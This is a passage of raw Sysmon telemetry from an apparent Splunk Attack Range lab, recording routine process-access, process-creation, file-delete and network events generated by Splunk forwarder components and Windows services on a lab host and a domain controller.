Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000810161Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:27.610{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F803-60EB-DA79-00000000D001}3068C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000810160Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:27.595{0C1E0330-F803-60EB-DA79-00000000D001}3068C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000810159Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:27.235{0C1E0330-F802-60EB-D979-00000000D001}28963404C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000810158Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:27.204{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3BF12B95FE12F3BF738F1D660B9B6C9C,SHA256=8FDE86DA4EE7DA01835263E4E35613905945EC97F2C2EB3C4AE3F5862AD92142,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054249Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:28.686{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C9130CA773DCF0950780DB4B9EE1DDF5,SHA256=123B825B05C3E5F3DBAB5E2C78B156AEDC3A689215E6E8078B0C51B35233C9D3,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000810189Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:28.454{0C1E0330-F804-60EB-DB79-00000000D001}39522948C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810188Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:28.313{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F804-60EB-DB79-00000000D001}3952C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810187Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:28.313{0C1E0330-048F-60E8-0500-00000000D001}412428C:\Windows\system32\csrss.exe{0C1E0330-F804-60EB-DB79-00000000D001}3952C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000810186Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:28.313{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810185Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:28.313{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810184Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:28.313{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810183Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:28.313{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810182Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:28.313{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810181Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:28.313{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810180Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:28.313{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810179Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:28.313{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810178Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:28.313{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810177Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:28.313{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F804-60EB-DB79-00000000D001}3952C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000810176Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:28.283{0C1E0330-F804-60EB-DB79-00000000D001}3952C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000810175Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:28.204{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=151CC76167CE8F7F6212DF06AA032E81,SHA256=B524892FEFA7A72FE28B49684D0D3414830B034B6A6C0B2265A3503B8D63D0D0,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001054248Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:20.615{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local61948-false10.0.1.12-8000- 23542300x80000000000000001054250Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:29.701{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5486AB91444C0E58451559EB77E88F39,SHA256=8DA02896440FA84DBDBE1D3E1399EC917D5ACABF2992255B99F77CB572F9C46E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810192Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:29.501{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F22B49524A7EC090C9F3529CBE67D482,SHA256=695802002FB1FEBBB3D5D1F46F34FA202BE7B62A43925507F2090E34F641AB97,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810191Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:29.220{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FAEBAFEAFC603BCD7DFD8D8C9B97F28E,SHA256=DB4FB2BC37035C036DD4E8D0A2F3436BFB76B3D1F588E230E830FFD0FA3C583F,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000810190Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:26.353{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57446-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001054251Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:30.716{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=455388E3969DF94A2185AEACDFAA4C5D,SHA256=6F3FB4FEBD801F20B5226FF8F9B3E0FF569475D3C0FEC85B0B2266EE9702A138,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810194Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:30.220{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6C741A8AC0982BFA605D3642B2FFA88A,SHA256=EAE61AF472CD9B4B8FCC1B8751664417802133BE67C89D392CE9961331051540,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810193Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:30.204{0C1E0330-0490-60E8-1200-00000000D001}980NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=138DB49657E96012339607FC355062F3,SHA256=EECB09C9015EBA1ABA8CE81F345BA8798D1419931992D92622481813CCEFFEBF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054252Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:31.733{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=564B848EF34F6749946EB7F9B6D2D2C1,SHA256=FD6658101A478DA63D49B910945CE6833BB99196B7059CB3D4FA2826786C0326,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810195Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:31.220{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=489595F92883EC4A0FE89490C4225D77,SHA256=8FA5A3F37DE08719643BAC54C88EEF82DD60189F293A6EFA30C78283AA9506BA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054253Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:32.768{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=57EF5CFC730DB9A33DDAAB3F7ACAADD6,SHA256=8174DFE30058CED051D35BA9C258AF9D79F078A71DBF6B03BA188FB51472206A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810196Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:32.235{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BEA56E7F80D00EC12E536B4BDB30B355,SHA256=EF3A0EE0B2093A9368FDB6E8B85DFBF4C142FB733048EEA80CDBC2D261603A6B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054254Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:33.798{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=021D82A509A5F2E4261D6537053288C0,SHA256=206A8FF0E311B318D005EA5A6018A13B9FBB2D2621673F3BD8644B6C2BFA0619,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810197Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:33.235{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=865E645B0C0C2C9ADB64767A8D08CBE5,SHA256=C2E422488ADC7DC7BDAA3211FDC6E68634B08D513670F52A776533EAB8413B36,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001054256Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:26.595{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local61949-false10.0.1.12-8000- 23542300x80000000000000001054255Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:34.799{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1F375805C1DA993E012DEA152357D24D,SHA256=6A742109DD6411B30245BC89D5B7EAAE3EBF6AD31B38B2C6C0C2C0D33C74B1BE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810199Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 